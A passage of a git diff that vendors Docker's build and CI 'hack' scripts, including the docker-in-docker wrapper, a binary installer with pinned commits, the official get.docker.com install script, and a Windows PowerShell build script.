leftover containers. Cleaning them up. + ! docker rm -f $(docker ps -aq) + fi + + # Force remove the image if it exists + ! docker rmi -f "docker-$COMMITHASH" &>/dev/null +fi + +# Provide the docker version for debugging purposes. If these fail, game over. +# as the Linux box isn't responding for some reason. +if [ $ec -eq 0 ]; then + echo INFO: Docker version and info of the outer daemon on the Linux node + echo + docker version + ec=$? + if [ 0 -ne $ec ]; then + echo "ERROR: The main linux daemon does not appear to be running. Has the Linux node crashed?" + fi + echo +fi + +# Same as above, but docker info +if [ $ec -eq 0 ]; then + echo + docker info + ec=$? + if [ 0 -ne $ec ]; then + echo "ERROR: The main linux daemon does not appear to be running. Has the Linux node crashed?" + fi + echo +fi + +# build the daemon image +if [ $ec -eq 0 ]; then + echo "INFO: Running docker build on Linux host at $DOCKER_HOST" + if [ $splitBinary -eq 0 ]; then + set -x + docker build --rm --force-rm --build-arg APT_MIRROR=cdn-fastly.deb.debian.org -t "docker:$COMMITHASH" . + cat < +# See the blog post: https://blog.docker.com/2013/09/docker-can-now-run-within-docker/ +# +# This script should be executed inside a docker container in privileged mode +# ('docker run --privileged', introduced in docker 0.6). + +# Usage: dind CMD [ARG...] + +# apparmor sucks and Docker needs to know that it's in a container (c) @tianon +export container=docker + +if [ -d /sys/kernel/security ] && ! mountpoint -q /sys/kernel/security; then + mount -t securityfs none /sys/kernel/security || { + echo >&2 'Could not mount /sys/kernel/security.' + echo >&2 'AppArmor detection and --privileged mode might break.' + } +fi + +# Mount /tmp (conditionally) +if ! mountpoint -q /tmp; then + mount -t tmpfs none /tmp +fi + +if [ $# -gt 0 ]; then + exec "$@" +fi + +echo >&2 'ERROR: No command specified.' +echo >&2 'You probably want to run hack/make.sh, or maybe a shell?' diff --git a/vendor/github.com/docker/docker/hack/dockerfile/binaries-commits b/vendor/github.com/docker/docker/hack/dockerfile/binaries-commits new file mode 100755 index 0000000000..8dfcca3946 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/dockerfile/binaries-commits @@ -0,0 +1,11 @@ +#!/bin/sh + +TOMLV_COMMIT=9baf8a8a9f2ed20a8e54160840c492f937eeaf9a + +# When updating RUNC_COMMIT, also update runc in vendor.conf accordingly +RUNC_COMMIT=9df8b306d01f59d3a8029be411de015b7304dd8f +CONTAINERD_COMMIT=aa8187dbd3b7ad67d8e5e3a15115d3eef43a7ed1 +TINI_COMMIT=949e6facb77383876aeff8a6944dde66b3089574 +LIBNETWORK_COMMIT=0f534354b813003a754606689722fe253101bc4e +VNDR_COMMIT=f56bd4504b4fad07a357913687fb652ee54bb3b0 +BINDATA_COMMIT=a0ff2567cfb70903282db057e799fd826784d41d diff --git a/vendor/github.com/docker/docker/hack/dockerfile/install-binaries.sh b/vendor/github.com/docker/docker/hack/dockerfile/install-binaries.sh new file mode 100755 index 0000000000..64f2b57da1 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/dockerfile/install-binaries.sh @@ -0,0 +1,123 @@ +#!/bin/sh +set -e +set -x + +. $(dirname "$0")/binaries-commits + +RM_GOPATH=0 + +TMP_GOPATH=${TMP_GOPATH:-""} + +if [ -z "$TMP_GOPATH" ]; then + export GOPATH="$(mktemp -d)" + RM_GOPATH=1 +else + export GOPATH="$TMP_GOPATH" +fi + +# Do not build with ambient capabilities support +RUNC_BUILDTAGS="${RUNC_BUILDTAGS:-"seccomp apparmor selinux"}" + +install_runc() { + echo "Install runc version $RUNC_COMMIT" + git clone https://github.com/docker/runc.git "$GOPATH/src/github.com/opencontainers/runc" + cd "$GOPATH/src/github.com/opencontainers/runc" + git checkout -q "$RUNC_COMMIT" + make BUILDTAGS="$RUNC_BUILDTAGS" $1 + cp runc /usr/local/bin/docker-runc +} + +install_containerd() { + echo "Install containerd version $CONTAINERD_COMMIT" + git clone https://github.com/docker/containerd.git "$GOPATH/src/github.com/docker/containerd" + cd "$GOPATH/src/github.com/docker/containerd" + git checkout -q "$CONTAINERD_COMMIT" + make $1 + cp bin/containerd /usr/local/bin/docker-containerd + cp bin/containerd-shim /usr/local/bin/docker-containerd-shim + cp bin/ctr /usr/local/bin/docker-containerd-ctr +} + +install_proxy() { + echo "Install docker-proxy version $LIBNETWORK_COMMIT" + git clone https://github.com/docker/libnetwork.git "$GOPATH/src/github.com/docker/libnetwork" + cd "$GOPATH/src/github.com/docker/libnetwork" + git checkout -q "$LIBNETWORK_COMMIT" + go build -ldflags="$PROXY_LDFLAGS" -o /usr/local/bin/docker-proxy github.com/docker/libnetwork/cmd/proxy +} + +install_bindata() { + echo "Install go-bindata version $BINDATA_COMMIT" + git clone https://github.com/jteeuwen/go-bindata "$GOPATH/src/github.com/jteeuwen/go-bindata" + cd $GOPATH/src/github.com/jteeuwen/go-bindata + git checkout -q "$BINDATA_COMMIT" + go build -o /usr/local/bin/go-bindata github.com/jteeuwen/go-bindata/go-bindata +} + +for prog in "$@" +do + case $prog in + tomlv) + echo "Install tomlv version $TOMLV_COMMIT" + git clone https://github.com/BurntSushi/toml.git "$GOPATH/src/github.com/BurntSushi/toml" + cd "$GOPATH/src/github.com/BurntSushi/toml" && git checkout -q "$TOMLV_COMMIT" + go build -v -o /usr/local/bin/tomlv github.com/BurntSushi/toml/cmd/tomlv + ;; + + runc) + install_runc static + ;; + + runc-dynamic) + install_runc + ;; + + containerd) + install_containerd static + ;; + + containerd-dynamic) + install_containerd + ;; + + tini) + echo "Install tini version $TINI_COMMIT" + git clone https://github.com/krallin/tini.git "$GOPATH/tini" + cd "$GOPATH/tini" + git checkout -q "$TINI_COMMIT" + cmake . + make tini-static + cp tini-static /usr/local/bin/docker-init + ;; + + proxy) + export CGO_ENABLED=0 + install_proxy + ;; + + proxy-dynamic) + PROXY_LDFLAGS="-linkmode=external" install_proxy + ;; + + vndr) + echo "Install vndr version $VNDR_COMMIT" + git clone https://github.com/LK4D4/vndr.git "$GOPATH/src/github.com/LK4D4/vndr" + cd "$GOPATH/src/github.com/LK4D4/vndr" + git checkout -q "$VNDR_COMMIT" + go build -v -o /usr/local/bin/vndr . + ;; + + bindata) + install_bindata + ;; + + *) + echo echo "Usage: $0 [tomlv|runc|containerd|tini|proxy]" + exit 1 + + esac +done + +if [ $RM_GOPATH -eq 1 ]; then + rm -rf "$GOPATH" +fi diff --git a/vendor/github.com/docker/docker/hack/generate-authors.sh b/vendor/github.com/docker/docker/hack/generate-authors.sh new file mode 100755 index 0000000000..e78a97f962 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/generate-authors.sh @@ -0,0 +1,15 @@ +#!/bin/bash +set -e + +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")/.." + +# see also ".mailmap" for how email addresses and names are deduplicated + +{ + cat <<-'EOH' + # This file lists all individuals having contributed content to the repository. + # For how it is generated, see `hack/generate-authors.sh`. + EOH + echo + git log --format='%aN <%aE>' | LC_ALL=C.UTF-8 sort -uf +} > AUTHORS diff --git a/vendor/github.com/docker/docker/hack/generate-swagger-api.sh b/vendor/github.com/docker/docker/hack/generate-swagger-api.sh new file mode 100755 index 0000000000..a8e9f818a7 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/generate-swagger-api.sh @@ -0,0 +1,22 @@ +#!/bin/sh +set -eu + +swagger generate model -f api/swagger.yaml \ + -t api -m types --skip-validator -C api/swagger-gen.yaml \ + -n Volume \ + -n Port \ + -n ImageSummary \ + -n Plugin -n PluginDevice -n PluginMount -n PluginEnv -n PluginInterfaceType \ + -n ErrorResponse \ + -n IdResponse \ + -n ServiceUpdateResponse + +swagger generate operation -f api/swagger.yaml \ + -t api -a types -m types -C api/swagger-gen.yaml \ + -T api/templates --skip-responses --skip-parameters --skip-validator \ + -n VolumesList \ + -n VolumesCreate \ + -n ContainerCreate \ + -n ContainerUpdate \ + -n Authenticate \ + -n ContainerWait diff --git a/vendor/github.com/docker/docker/hack/install.sh b/vendor/github.com/docker/docker/hack/install.sh new file mode 100644 index 0000000000..cc20d69396 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/install.sh @@ -0,0 +1,484 @@ +#!/bin/sh +set -e +# +# This script is meant for quick & easy install via: +# 'curl -sSL https://get.docker.com/ | sh' +# or: +# 'wget -qO- https://get.docker.com/ | sh' +# +# For test builds (ie. release candidates): +# 'curl -fsSL https://test.docker.com/ | sh' +# or: +# 'wget -qO- https://test.docker.com/ | sh' +# +# For experimental builds: +# 'curl -fsSL https://experimental.docker.com/ | sh' +# or: +# 'wget -qO- https://experimental.docker.com/ | sh' +# +# Docker Maintainers: +# To update this script on https://get.docker.com, +# use hack/release.sh during a normal release, +# or the following one-liner for script hotfixes: +# aws s3 cp --acl public-read hack/install.sh s3://get.docker.com/index +# + +url="https://get.docker.com/" +apt_url="https://apt.dockerproject.org" +yum_url="https://yum.dockerproject.org" +gpg_fingerprint="58118E89F3A912897C070ADBF76221572C52609D" + +key_servers=" +ha.pool.sks-keyservers.net +pgp.mit.edu +keyserver.ubuntu.com +" + +mirror='' +while [ $# -gt 0 ]; do + case "$1" in + --mirror) + mirror="$2" + shift + ;; + *) + echo "Illegal option $1" + ;; + esac + shift $(( $# > 0 ? 1 : 0 )) +done + +case "$mirror" in + AzureChinaCloud) + apt_url="https://mirror.azure.cn/docker-engine/apt" + yum_url="https://mirror.azure.cn/docker-engine/yum" + ;; +esac + +command_exists() { + command -v "$@" > /dev/null 2>&1 +} + +echo_docker_as_nonroot() { + if command_exists docker && [ -e /var/run/docker.sock ]; then + ( + set -x + $sh_c 'docker version' + ) || true + fi + your_user=your-user + [ "$user" != 'root' ] && your_user="$user" + # intentionally mixed spaces and tabs here -- tabs are stripped by "<<-EOF", spaces are kept in the output + cat <<-EOF + + If you would like to use Docker as a non-root user, you should now consider + adding your user to the "docker" group with something like: + + sudo usermod -aG docker $your_user + + Remember that you will have to log out and back in for this to take effect! + + EOF +} + +# Check if this is a forked Linux distro +check_forked() { + + # Check for lsb_release command existence, it usually exists in forked distros + if command_exists lsb_release; then + # Check if the `-u` option is supported + set +e + lsb_release -a -u > /dev/null 2>&1 + lsb_release_exit_code=$? + set -e + + # Check if the command has exited successfully, it means we're in a forked distro + if [ "$lsb_release_exit_code" = "0" ]; then + # Print info about current distro + cat <<-EOF + You're using '$lsb_dist' version '$dist_version'. + EOF + + # Get the upstream release info + lsb_dist=$(lsb_release -a -u 2>&1 | tr '[:upper:]' '[:lower:]' | grep -E 'id' | cut -d ':' -f 2 | tr -d '[[:space:]]') + dist_version=$(lsb_release -a -u 2>&1 | tr '[:upper:]' '[:lower:]' | grep -E 'codename' | cut -d ':' -f 2 | tr -d '[[:space:]]') + + # Print info about upstream distro + cat <<-EOF + Upstream release is '$lsb_dist' version '$dist_version'. + EOF + else + if [ -r /etc/debian_version ] && [ "$lsb_dist" != "ubuntu" ] && [ "$lsb_dist" != "raspbian" ]; then + # We're Debian and don't even know it! + lsb_dist=debian + dist_version="$(cat /etc/debian_version | sed 's/\/.*//' | sed 's/\..*//')" + case "$dist_version" in + 9) + dist_version="stretch" + ;; + 8|'Kali Linux 2') + dist_version="jessie" + ;; + 7) + dist_version="wheezy" + ;; + esac + fi + fi + fi +} + +rpm_import_repository_key() { + local key=$1; shift + local tmpdir=$(mktemp -d) + chmod 600 "$tmpdir" + for key_server in $key_servers ; do + gpg --homedir "$tmpdir" --keyserver "$key_server" --recv-keys "$key" && break + done + gpg --homedir "$tmpdir" -k "$key" >/dev/null + gpg --homedir "$tmpdir" --export --armor "$key" > "$tmpdir"/repo.key + rpm --import "$tmpdir"/repo.key + rm -rf "$tmpdir" +} + +semverParse() { + major="${1%%.*}" + minor="${1#$major.}" + minor="${minor%%.*}" + patch="${1#$major.$minor.}" + patch="${patch%%[-.]*}" +} + +do_install() { + architecture=$(uname -m) + case $architecture in + # officially supported + amd64|x86_64) + ;; + # unofficially supported with available repositories + armv6l|armv7l) + ;; + # unofficially supported without available repositories + aarch64|arm64|ppc64le|s390x) + cat 1>&2 <<-EOF + Error: Docker doesn't officially support $architecture and no Docker $architecture repository exists. + EOF + exit 1 + ;; + # not supported + *) + cat >&2 <<-EOF + Error: $architecture is not a recognized platform. + EOF + exit 1 + ;; + esac + + if command_exists docker; then + version="$(docker -v | cut -d ' ' -f3 | cut -d ',' -f1)" + MAJOR_W=1 + MINOR_W=10 + + semverParse $version + + shouldWarn=0 + if [ $major -lt $MAJOR_W ]; then + shouldWarn=1 + fi + + if [ $major -le $MAJOR_W ] && [ $minor -lt $MINOR_W ]; then + shouldWarn=1 + fi + + cat >&2 <<-'EOF' + Warning: the "docker" command appears to already exist on this system. + + If you already have Docker installed, this script can cause trouble, which is + why we're displaying this warning and provide the opportunity to cancel the + installation. + + If you installed the current Docker package using this script and are using it + EOF + + if [ $shouldWarn -eq 1 ]; then + cat >&2 <<-'EOF' + again to update Docker, we urge you to migrate your image store before upgrading + to v1.10+. + + You can find instructions for this here: + https://github.com/docker/docker/wiki/Engine-v1.10.0-content-addressability-migration + EOF + else + cat >&2 <<-'EOF' + again to update Docker, you can safely ignore this message. + EOF + fi + + cat >&2 <<-'EOF' + + You may press Ctrl+C now to abort this script. + EOF + ( set -x; sleep 20 ) + fi + + user="$(id -un 2>/dev/null || true)" + + sh_c='sh -c' + if [ "$user" != 'root' ]; then + if command_exists sudo; then + sh_c='sudo -E sh -c' + elif command_exists su; then + sh_c='su -c' + else + cat >&2 <<-'EOF' + Error: this installer needs the ability to run commands as root. + We are unable to find either "sudo" or "su" available to make this happen. + EOF + exit 1 + fi + fi + + curl='' + if command_exists curl; then + curl='curl -sSL' + elif command_exists wget; then + curl='wget -qO-' + elif command_exists busybox && busybox --list-modules | grep -q wget; then + curl='busybox wget -qO-' + fi + + # check to see which repo they are trying to install from + if [ -z "$repo" ]; then + repo='main' + if [ "https://test.docker.com/" = "$url" ]; then + repo='testing' + elif [ "https://experimental.docker.com/" = "$url" ]; then + repo='experimental' + fi + fi + + # perform some very rudimentary platform detection + lsb_dist='' + dist_version='' + if command_exists lsb_release; then + lsb_dist="$(lsb_release -si)" + fi + if [ -z "$lsb_dist" ] && [ -r /etc/lsb-release ]; then + lsb_dist="$(. /etc/lsb-release && echo "$DISTRIB_ID")" + fi + if [ -z "$lsb_dist" ] && [ -r /etc/debian_version ]; then + lsb_dist='debian' + fi + if [ -z "$lsb_dist" ] && [ -r /etc/fedora-release ]; then + lsb_dist='fedora' + fi + if [ -z "$lsb_dist" ] && [ -r /etc/oracle-release ]; then + lsb_dist='oracleserver' + fi + if [ -z "$lsb_dist" ] && [ -r /etc/centos-release ]; then + lsb_dist='centos' + fi + if [ -z "$lsb_dist" ] && [ -r /etc/redhat-release ]; then + lsb_dist='redhat' + fi + if [ -z "$lsb_dist" ] && [ -r /etc/photon-release ]; then + lsb_dist='photon' + fi + if [ -z "$lsb_dist" ] && [ -r /etc/os-release ]; then + lsb_dist="$(. /etc/os-release && echo "$ID")" + fi + + lsb_dist="$(echo "$lsb_dist" | tr '[:upper:]' '[:lower:]')" + + # Special case redhatenterpriseserver + if [ "${lsb_dist}" = "redhatenterpriseserver" ]; then + # Set it to redhat, it will be changed to centos below anyways + lsb_dist='redhat' + fi + + case "$lsb_dist" in + + ubuntu) + if command_exists lsb_release; then + dist_version="$(lsb_release --codename | cut -f2)" + fi + if [ -z "$dist_version" ] && [ -r /etc/lsb-release ]; then + dist_version="$(. /etc/lsb-release && echo "$DISTRIB_CODENAME")" + fi + ;; + + debian|raspbian) + dist_version="$(cat /etc/debian_version | sed 's/\/.*//' | sed 's/\..*//')" + case "$dist_version" in + 8) + dist_version="jessie" + ;; + 7) + dist_version="wheezy" + ;; + esac + ;; + + oracleserver) + # need to switch lsb_dist to match yum repo URL + lsb_dist="oraclelinux" + dist_version="$(rpm -q --whatprovides redhat-release --queryformat "%{VERSION}\n" | sed 's/\/.*//' | sed 's/\..*//' | sed 's/Server*//')" + ;; + + fedora|centos|redhat) + dist_version="$(rpm -q --whatprovides ${lsb_dist}-release --queryformat "%{VERSION}\n" | sed 's/\/.*//' | sed 's/\..*//' | sed 's/Server*//' | sort | tail -1)" + ;; + + "vmware photon") + lsb_dist="photon" + dist_version="$(. /etc/os-release && echo "$VERSION_ID")" + ;; + + *) + if command_exists lsb_release; then + dist_version="$(lsb_release --codename | cut -f2)" + fi + if [ -z "$dist_version" ] && [ -r /etc/os-release ]; then + dist_version="$(. /etc/os-release && echo "$VERSION_ID")" + fi + ;; + + + esac + + # Check if this is a forked Linux distro + check_forked + + # Run setup for each distro accordingly + case "$lsb_dist" in + ubuntu|debian|raspbian) + export DEBIAN_FRONTEND=noninteractive + + did_apt_get_update= + apt_get_update() { + if [ -z "$did_apt_get_update" ]; then + ( set -x; $sh_c 'sleep 3; apt-get update' ) + did_apt_get_update=1 + fi + } + + if [ "$lsb_dist" != "raspbian" ]; then + # aufs is preferred over devicemapper; try to ensure the driver is available. + if ! grep -q aufs /proc/filesystems && ! $sh_c 'modprobe aufs'; then + if uname -r | grep -q -- '-generic' && dpkg -l 'linux-image-*-generic' | grep -qE '^ii|^hi' 2>/dev/null; then + kern_extras="linux-image-extra-$(uname -r) linux-image-extra-virtual" + + apt_get_update + ( set -x; $sh_c 'sleep 3; apt-get install -y -q '"$kern_extras" ) || true + + if ! grep -q aufs /proc/filesystems && ! $sh_c 'modprobe aufs'; then + echo >&2 'Warning: tried to install '"$kern_extras"' (for AUFS)' + echo >&2 ' but we still have no AUFS. Docker may not work. Proceeding anyways!' + ( set -x; sleep 10 ) + fi + else + echo >&2 'Warning: current kernel is not supported by the linux-image-extra-virtual' + echo >&2 ' package. We have no AUFS support. Consider installing the packages' + echo >&2 ' linux-image-virtual kernel and linux-image-extra-virtual for AUFS support.' + ( set -x; sleep 10 ) + fi + fi + fi + + # install apparmor utils if they're missing and apparmor is enabled in the kernel + # otherwise Docker will fail to start + if [ "$(cat /sys/module/apparmor/parameters/enabled 2>/dev/null)" = 'Y' ]; then + if command -v apparmor_parser >/dev/null 2>&1; then + echo 'apparmor is enabled in the kernel and apparmor utils were already installed' + else + echo 'apparmor is enabled in the kernel, but apparmor_parser is missing. Trying to install it..' + apt_get_update + ( set -x; $sh_c 'sleep 3; apt-get install -y -q apparmor' ) + fi + fi + + if [ ! -e /usr/lib/apt/methods/https ]; then + apt_get_update + ( set -x; $sh_c 'sleep 3; apt-get install -y -q apt-transport-https ca-certificates' ) + fi + if [ -z "$curl" ]; then + apt_get_update + ( set -x; $sh_c 'sleep 3; apt-get install -y -q curl ca-certificates' ) + curl='curl -sSL' + fi + if ! command -v gpg > /dev/null; then + apt_get_update + ( set -x; $sh_c 'sleep 3; apt-get install -y -q gnupg2 || apt-get install -y -q gnupg' ) + fi + + # dirmngr is a separate package in ubuntu yakkety; see https://bugs.launchpad.net/ubuntu/+source/apt/+bug/1634464 + if ! command -v dirmngr > /dev/null; then + apt_get_update + ( set -x; $sh_c 'sleep 3; apt-get install -y -q dirmngr' ) + fi + + ( + set -x + for key_server in $key_servers ; do + $sh_c "apt-key adv --keyserver hkp://${key_server}:80 --recv-keys ${gpg_fingerprint}" && break + done + $sh_c "apt-key adv -k ${gpg_fingerprint} >/dev/null" + $sh_c "mkdir -p /etc/apt/sources.list.d" + $sh_c "echo deb \[arch=$(dpkg --print-architecture)\] ${apt_url}/repo ${lsb_dist}-${dist_version} ${repo} > /etc/apt/sources.list.d/docker.list" + $sh_c 'sleep 3; apt-get update; apt-get install -y -q docker-engine' + ) + echo_docker_as_nonroot + exit 0 + ;; + + fedora|centos|redhat|oraclelinux|photon) + if [ "${lsb_dist}" = "redhat" ]; then + # we use the centos repository for both redhat and centos releases + lsb_dist='centos' + fi + $sh_c "cat >/etc/yum.repos.d/docker-${repo}.repo" <<-EOF + [docker-${repo}-repo] + name=Docker ${repo} Repository + baseurl=${yum_url}/repo/${repo}/${lsb_dist}/${dist_version} + enabled=1 + gpgcheck=1 + gpgkey=${yum_url}/gpg + EOF + if [ "$lsb_dist" = "fedora" ] && [ "$dist_version" -ge "22" ]; then + ( + set -x + $sh_c 'sleep 3; dnf -y -q install docker-engine' + ) + elif [ "$lsb_dist" = "photon" ]; then + ( + set -x + $sh_c 'sleep 3; tdnf -y install docker-engine' + ) + else + ( + set -x + $sh_c 'sleep 3; yum -y -q install docker-engine' + ) + fi + echo_docker_as_nonroot + exit 0 + ;; + esac + + # intentionally mixed spaces and tabs here -- tabs are stripped by "<<-'EOF'", spaces are kept in the output + cat >&2 <<-'EOF' + + Either your platform is not easily detectable, is not supported by this + installer script (yet - PRs welcome! [hack/install.sh]), or does not yet have + a package for Docker. Please visit the following URL for more detailed + installation instructions: + + https://docs.docker.com/engine/installation/ + + EOF + exit 1 +} + +# wrapped up in a function so that we have some protection against only getting +# half the file during "curl | sh" +do_install diff --git a/vendor/github.com/docker/docker/hack/make.ps1 b/vendor/github.com/docker/docker/hack/make.ps1 new file mode 100644 index 0000000000..14b9603b2e --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make.ps1 @@ -0,0 +1,408 @@ +<# +.NOTES + Author: @jhowardmsft + + Summary: Windows native build script. This is similar to functionality provided + by hack\make.sh, but uses native Windows PowerShell semantics. It does + not support the full set of options provided by the Linux counterpart. + For example: + + - You can't cross-build Linux docker binaries on Windows + - Hashes aren't generated on binaries + - 'Releasing' isn't supported. + - Integration tests. This is because they currently cannot run inside a container, + and require significant external setup. + + It does however provided the minimum necessary to support parts of local Windows + development and Windows to Windows CI. + + Usage Examples (run from repo root): + "hack\make.ps1 -Binary" to build the binaries + "hack\make.ps1 -Client" to build just the client 64-bit binary + "hack\make.ps1 -TestUnit" to run unit tests + "hack\make.ps1 -Binary -TestUnit" to build the binaries and run unit tests + "hack\make.ps1 -All" to run everything this script knows about + +.PARAMETER Client + Builds the client binaries. + +.PARAMETER Daemon + Builds the daemon binary. + +.PARAMETER Binary + Builds the client binaries and the daemon binary. A convenient shortcut to `make.ps1 -Client -Daemon`. + +.PARAMETER Race + Use -race in go build and go test. + +.PARAMETER Noisy + Use -v in go build. + +.PARAMETER ForceBuildAll + Use -a in go build. + +.PARAMETER NoOpt + Use -gcflags -N -l in go build to disable optimisation (can aide debugging). + +.PARAMETER CommitSuffix + Adds a custom string to be appended to the commit ID (spaces are stripped). + +.PARAMETER DCO + Runs the DCO (Developer Certificate Of Origin) test. + +.PARAMETER PkgImports + Runs the pkg\ directory imports test. + +.PARAMETER GoFormat + Runs the Go formatting test. + +.PARAMETER TestUnit + Runs unit tests. + +.PARAMETER All + Runs everything this script knows about. + + +TODO +- Unify the head commit +- Sort out the GITCOMMIT environment variable in the absense of a .git (longer term) +- Add golint and other checks (swagger maybe?) + +#> + + +param( + [Parameter(Mandatory=$False)][switch]$Client, + [Parameter(Mandatory=$False)][switch]$Daemon, + [Parameter(Mandatory=$False)][switch]$Binary, + [Parameter(Mandatory=$False)][switch]$Race, + [Parameter(Mandatory=$False)][switch]$Noisy, + [Parameter(Mandatory=$False)][switch]$ForceBuildAll, + [Parameter(Mandatory=$False)][switch]$NoOpt, + [Parameter(Mandatory=$False)][string]$CommitSuffix="", + [Parameter(Mandatory=$False)][switch]$DCO, + [Parameter(Mandatory=$False)][switch]$PkgImports, + [Parameter(Mandatory=$False)][switch]$GoFormat, + [Parameter(Mandatory=$False)][switch]$TestUnit, + [Parameter(Mandatory=$False)][switch]$All +) + +$ErrorActionPreference = "Stop" +$pushed=$False # To restore the directory if we have temporarily pushed to one. + +# Utility function to get the commit ID of the repository +Function Get-GitCommit() { + if (-not (Test-Path ".\.git")) { + # If we don't have a .git directory, but we do have the environment + # variable DOCKER_GITCOMMIT set, that can override it. + if ($env:DOCKER_GITCOMMIT.Length -eq 0) { + Throw ".git directory missing and DOCKER_GITCOMMIT environment variable not specified." + } + Write-Host "INFO: Git commit assumed from DOCKER_GITCOMMIT environment variable" + return $env:DOCKER_GITCOMMIT + } + $gitCommit=$(git rev-parse --short HEAD) + if ($(git status --porcelain --untracked-files=no).Length -ne 0) { + $gitCommit="$gitCommit-unsupported" + Write-Host "" + Write-Warning "This version is unsupported because there are uncommitted file(s)." + Write-Warning "Either commit these changes, or add them to .gitignore." + git status --porcelain --untracked-files=no | Write-Warning + Write-Host "" + } + return $gitCommit +} + +# Utility function to get get the current build version of docker +Function Get-DockerVersion() { + if (-not (Test-Path ".\VERSION")) { Throw "VERSION file not found. Is this running from the root of a docker repository?" } + return $(Get-Content ".\VERSION" -raw).ToString().Replace("`n","").Trim() +} + +# Utility function to determine if we are running in a container or not. +# In Windows, we get this through an environment variable set in `Dockerfile.Windows` +Function Check-InContainer() { + if ($env:FROM_DOCKERFILE.Length -eq 0) { + Write-Host "" + Write-Warning "Not running in a container. The result might be an incorrect build." + Write-Host "" + } +} + +# Utility function to get the commit for HEAD +Function Get-HeadCommit() { + $head = Invoke-Expression "git rev-parse --verify HEAD" + if ($LASTEXITCODE -ne 0) { Throw "Failed getting HEAD commit" } + + return $head +} + +# Utility function to get the commit for upstream +Function Get-UpstreamCommit() { + Invoke-Expression "git fetch -q https://github.com/docker/docker.git refs/heads/master" + if ($LASTEXITCODE -ne 0) { Throw "Failed fetching" } + + $upstream = Invoke-Expression "git rev-parse --verify FETCH_HEAD" + if ($LASTEXITCODE -ne 0) { Throw "Failed getting upstream commit" } + + return $upstream +} + +# Build a binary (client or daemon) +Function Execute-Build($type, $additionalBuildTags, $directory) { + # Generate the build flags + $buildTags = "autogen" + if ($Noisy) { $verboseParm=" -v" } + if ($Race) { Write-Warning "Using race detector"; $raceParm=" -race"} + if ($ForceBuildAll) { $allParm=" -a" } + if ($NoOpt) { $optParm=" -gcflags "+""""+"-N -l"+"""" } + if ($addtionalBuildTags -ne "") { $buildTags += $(" " + $additionalBuildTags) } + + # Do the go build in the appropriate directory + # Note -linkmode=internal is required to be able to debug on Windows. + # https://github.com/golang/go/issues/14319#issuecomment-189576638 + Write-Host "INFO: Building $type..." + Push-Location $root\cmd\$directory; $global:pushed=$True + $buildCommand = "go build" + ` + $raceParm + ` + $verboseParm + ` + $allParm + ` + $optParm + ` + " -tags """ + $buildTags + """" + ` + " -ldflags """ + "-linkmode=internal" + """" + ` + " -o $root\bundles\"+$directory+".exe" + Invoke-Expression $buildCommand + if ($LASTEXITCODE -ne 0) { Throw "Failed to compile $type" } + Pop-Location; $global:pushed=$False +} + + +# Validates the DCO marker is present on each commit +Function Validate-DCO($headCommit, $upstreamCommit) { + Write-Host "INFO: Validating Developer Certificate of Origin..." + # Username may only contain alphanumeric characters or dashes and cannot begin with a dash + $usernameRegex='[a-zA-Z0-9][a-zA-Z0-9-]+' + + $dcoPrefix="Signed-off-by:" + $dcoRegex="^(Docker-DCO-1.1-)?$dcoPrefix ([^<]+) <([^<>@]+@[^<>]+)>( \\(github: ($usernameRegex)\\))?$" + + $counts = Invoke-Expression "git diff --numstat $upstreamCommit...$headCommit" + if ($LASTEXITCODE -ne 0) { Throw "Failed git diff --numstat" } + + # Counts of adds and deletes after removing multiple white spaces. AWK anyone? :( + $adds=0; $dels=0; $($counts -replace '\s+', ' ') | %{ + $a=$_.Split(" "); + if ($a[0] -ne "-") { $adds+=[int]$a[0] } + if ($a[1] -ne "-") { $dels+=[int]$a[1] } + } + if (($adds -eq 0) -and ($dels -eq 0)) { + Write-Warning "DCO validation - nothing to validate!" + return + } + + $commits = Invoke-Expression "git log $upstreamCommit..$headCommit --format=format:%H%n" + if ($LASTEXITCODE -ne 0) { Throw "Failed git log --format" } + $commits = $($commits -split '\s+' -match '\S') + $badCommits=@() + $commits | %{ + # Skip commits with no content such as merge commits etc + if ($(git log -1 --format=format: --name-status $_).Length -gt 0) { + # Ignore exit code on next call - always process regardless + $commitMessage = Invoke-Expression "git log -1 --format=format:%B --name-status $_" + if (($commitMessage -match $dcoRegex).Length -eq 0) { $badCommits+=$_ } + } + } + if ($badCommits.Length -eq 0) { + Write-Host "Congratulations! All commits are properly signed with the DCO!" + } else { + $e = "`nThese commits do not have a proper '$dcoPrefix' marker:`n" + $badCommits | %{ $e+=" - $_`n"} + $e += "`nPlease amend each commit to include a properly formatted DCO marker.`n`n" + $e += "Visit the following URL for information about the Docker DCO:`n" + $e += "https://github.com/docker/docker/blob/master/CONTRIBUTING.md#sign-your-work`n" + Throw $e + } +} + +# Validates that .\pkg\... is safely isolated from internal code +Function Validate-PkgImports($headCommit, $upstreamCommit) { + Write-Host "INFO: Validating pkg import isolation..." + + # Get a list of go source-code files which have changed under pkg\. Ignore exit code on next call - always process regardless + $files=@(); $files = Invoke-Expression "git diff $upstreamCommit...$headCommit --diff-filter=ACMR --name-only -- `'pkg\*.go`'" + $badFiles=@(); $files | %{ + $file=$_ + # For the current changed file, get its list of dependencies, sorted and uniqued. + $imports = Invoke-Expression "go list -e -f `'{{ .Deps }}`' $file" + if ($LASTEXITCODE -ne 0) { Throw "Failed go list for dependencies on $file" } + $imports = $imports -Replace "\[" -Replace "\]", "" -Split(" ") | Sort-Object | Get-Unique + # Filter out what we are looking for + $imports = $imports -NotMatch "^github.com/docker/docker/pkg/" ` + -NotMatch "^github.com/docker/docker/vendor" ` + -Match "^github.com/docker/docker" ` + -Replace "`n", "" + $imports | % { $badFiles+="$file imports $_`n" } + } + if ($badFiles.Length -eq 0) { + Write-Host 'Congratulations! ".\pkg\*.go" is safely isolated from internal code.' + } else { + $e = "`nThese files import internal code: (either directly or indirectly)`n" + $badFiles | %{ $e+=" - $_"} + Throw $e + } +} + +# Validates that changed files are correctly go-formatted +Function Validate-GoFormat($headCommit, $upstreamCommit) { + Write-Host "INFO: Validating go formatting on changed files..." + + # Verify gofmt is installed + if ($(Get-Command gofmt -ErrorAction SilentlyContinue) -eq $nil) { Throw "gofmt does not appear to be installed" } + + # Get a list of all go source-code files which have changed. Ignore exit code on next call - always process regardless + $files=@(); $files = Invoke-Expression "git diff 